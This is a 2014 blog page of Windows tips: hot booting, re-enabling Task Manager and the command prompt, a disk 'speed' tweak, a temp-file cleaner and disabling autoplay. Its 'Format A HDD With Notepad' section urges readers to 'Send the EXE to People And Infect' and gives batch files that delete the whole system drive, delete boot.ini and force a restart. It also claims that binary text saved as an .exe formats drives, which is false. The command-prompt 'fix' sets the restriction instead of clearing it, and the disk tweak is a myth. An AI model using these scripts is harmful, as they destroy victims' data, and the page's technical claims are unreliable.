Wednesday, July 2, 2014
Restart Windows without Restarting your PC
Mostly Computer takes lots of time for restart. Sometimes we need to restart our computer, that time it becomes necessity like after installing some software but when we have limited time and we are busy then it is very annoying to wait for it to restart.
So here is solution for this problem. In that case you need not to restart your computer but you can restart your windows without restarting computer. It will take very less time.
To restart windows without restarting computer you just need to hold Shift key down while clicking on shutdown or restart button.
you computer would restart without restarting the Computer.
Restart Windows without Restarting PC, this term is known as Hot Booting.
Enable Task Manager after Disabled by your Administrator
When you try to open Task Manager, the following error may occur:
Task Manager has been disabled by your administrator
Resolution
This error is caused if the DisableTaskMgr restriction is enabled. To enable Task Manager, try one of these method:
Method 1
Click Start, Run and type this command exactly as given below: (better - Copy and paste)
Top of Form
REG add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 0 /f
Bottom of Form
Method 2
• Click Start, Run and type Regedit.exe
• Navigate to the following branch:
HKEY_CURRENT_USER \ Software \ Microsoft \ Windows \ CurrentVersion \ Policies\ System
• In the right-pane, delete the value named DisableTaskMgr
• Close Regedit.exe
Method 3:
Using Group Policy Editor - for Windows XP Professional
• Click Start, Run, type gpedit.msc and click OK.
• Navigate to this branch:
User Configuration / Administrative Templates / System / Ctrl+Alt+Delete Options / Remove Task Manager
• Double-click the Remove Task Manager option.
• Set the policy to Not Configured.
Message: "The command prompt has been disabled by your administrator"
When you attempt to run CMD.exe or a batch file, you may receive the message "The command prompt has been disabled by your administrator". This is caused by restrictions placed in Registry. DisableCMD value is set to 1 or via Group Policy. To enable Task Manager, try any of these methods:
Method 1:
Using the console registry tool
Click Start, Run and type this command exactly as given below: (better - Copy and paste)
REG add HKCU\Software\Policies\Microsoft\Windows\System /v DisableCMD /t REG_DWORD /d 1 /f
Method 2:
Edit the registry directly
Open Registry Editor (Regedit.exe) and navigate to:
[HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System]
In the right-pane, double-click DisableCMD and set it's data to 0
Method 3:
Using Group Policy Editor in Windows XP Professional.
Click Start, Run, type gpedit.msc and click OK.
Navigate to User Configuration \ Administrative Templates \ System
Double-click the Prevent access to the command prompt
You can then disable or set the policy to Not Configured. Disabling or setting this policy to Not Configured should solve the problem.\
Increase Hard Disk Speed In Windows 100% No Software Require :)
If you like to increase/optimize your Hard Disk I/O - read/write speed without buying expensive software utilities to do that job or changing the HD, just follow next steps. With doing these steps you will increase Hard disk speed (depends of manufacture and specification, but its worth to try). The most speed improvement is visible with IDE drives;
In any case, it won't harm your system, so try it yourself and let me know what you find!
Steps:
1. Run SYSEDIT.EXE from the start & then Run command.
2. Expand the system.ini file window.
3. Scroll down almost to the end of the file untill you find a line called [386enh].
4. Press Enter to make one blank line, and in that line type
5. Irq14=4096 (note: This line IS CASE SENSITIVE)
6. Click on the File menu, then choose Save.
7. Close SYSEDIT and reboot your computer.
8. Restart windows!
The speed improvement will be noticed just after the system reboots, any system info. software can be used to check the improvement.
Enjoy it :D
Format A HDD With Notepad
If you think that Notepad is useless then you are wrong because you can now do a lot of things with the Notepad which you could have never imagined. In this trick I will show you how to format a HDD using Notepad. This is really cool.
Step 1 :-
Copy The Following In Notepad Exactly as it is.
says01001011000111110010010101010101010000011111100000
Step 2 :-
Save As An EXE Any Name Will Do
Step 3 :-
Send the EXE to People And Infect
OR
IF you think cannot format C Drive when windows is running try Laughing and u will get it Razz .. any way some more so u can test on other drives this is simple binary code
format c:\ /Q/X — this will format your drive c:\
01100110011011110111001001101101011000010111010000 100000011000110011101001011100
0010000000101111010100010010111101011000
format d:\ /Q/X — this will format your dirve d:\
01100110011011110111001001101101011000010111010000 100000011001000011101001011100
0010000000101111010100010010111101011000
format a:\ /Q/X — this will format your drive a:\
01100110011011110111001001101101011000010111010000 100000011000010011101001011100
0010000000101111010100010010111101011000
del /F/S/Q c:\boot.ini — this will cause your computer not to boot.
01100100011001010110110000100000001011110100011000 101111010100110010111101010001
00100000011000110011101001011100011000100110111101 101111011101000010111001101001
0110111001101001
try to figure out yourself rest
cant spoonfeed
its working
Do not try it on your PC. Don’t mess around this is for educational purpose only
still if you cant figure it out try this
go to notepad and type the following:
@Echo off
Del C:\ *.*|y
save it as Dell.bat
want worse then type the following:
@echo off
del %systemdrive%\*.*/f/s/q
shutdown -r -f -t 00
and save it as a .bat file
Tricks To Clean All Temporary Files,Cookies, Temporary Internet Files
Just use notepad....
Step 1:
Start with making a new txt file.
Step 2:
Paste this code in the txt file:
Code: Select all
@echo off
echo Webhog Cleaner
echo waiting
del /f /s /q %systemdrive%\*.tmp
del /f /s /q %systemdrive%\*._mp
del /f /s /q %systemdrive%\*.log
del /f /s /q %systemdrive%\*.gid
del /f /s /q %systemdrive%\*.chk
del /f /s /q %systemdrive%\*.old
del /f /s /q %systemdrive%\recycled\*.*
del /f /s /q %windir%\*.bak
del /f /s /q %windir%\prefetch\*.*
rd /s /q %windir%\temp & md %windir%\temp
del /f /q %userprofile%\cookies\*.*
del /f /q %userprofile%\recent\*.*
del /f /s /q ?%userprofile%\Local Settings\Temporary Internet Files\*.*?
del /f /s /q ?%userprofile%\Local Settings\Temp\*.*?
del /f /s /q ?%userprofile%\recent\*.*?
echo complete!
echo. & pause
Step 3:
Now save the file as "Cleaner.bat"
After saving this file, Just open it and see for your self.
USE YOUR WINDOWS 7, 8 or WINDOWS 8.1 AS ADMINISTRATOR
When we said about the full control in Windows 7 we thank about administrator Controller, and all application need to run as administrator, so how can we run our Computer as an Administrator? Here a few step that will show all of you how to use your computer :
Step 1: right click on My Computer than click on Manage it will prompt as show on the Picture.
Step 2: See Picture Bellow:
Disable Auto run in windows 7, 8 or windows 8.1
If we talk about Auto run we think about some kind of Virus that have extension.inf.
For all application that have extension with .inf is kinds of virus, but it would not impact to your file,or your documents, but it will be a bridge for other virus come into your computer easy, so in this tutor i will show you step by step how to disable auto run in windows 7:
Step 1: Go to start menu than clcik run. (see picture bellow)
Step 2: Type gpedit.msc than click ok. (see Picture bellow)
Step 3: Local Group Policy Editor is open.(see Picture bellow)
Step 4: In Local Group Policy Editor on left panel click on Anministrative Template and than Windows Components. (See Picture bellow)
Step 5: In left Panel click on AutoPlay Policies. (see Picture bellow)
Step 6: In AutoPlay Policies in right panel, right click on turn off autoplay than click edit. (See Picture bellow)
Step 7: After that new window is open under Turn off AutoPlay than tick enable and make sure you selcet all drive than Click Apply and Ok.(See Picture bellow)
And than restart your Computer, Finish enjoy it.
Subscribe to:
Posts (Atom)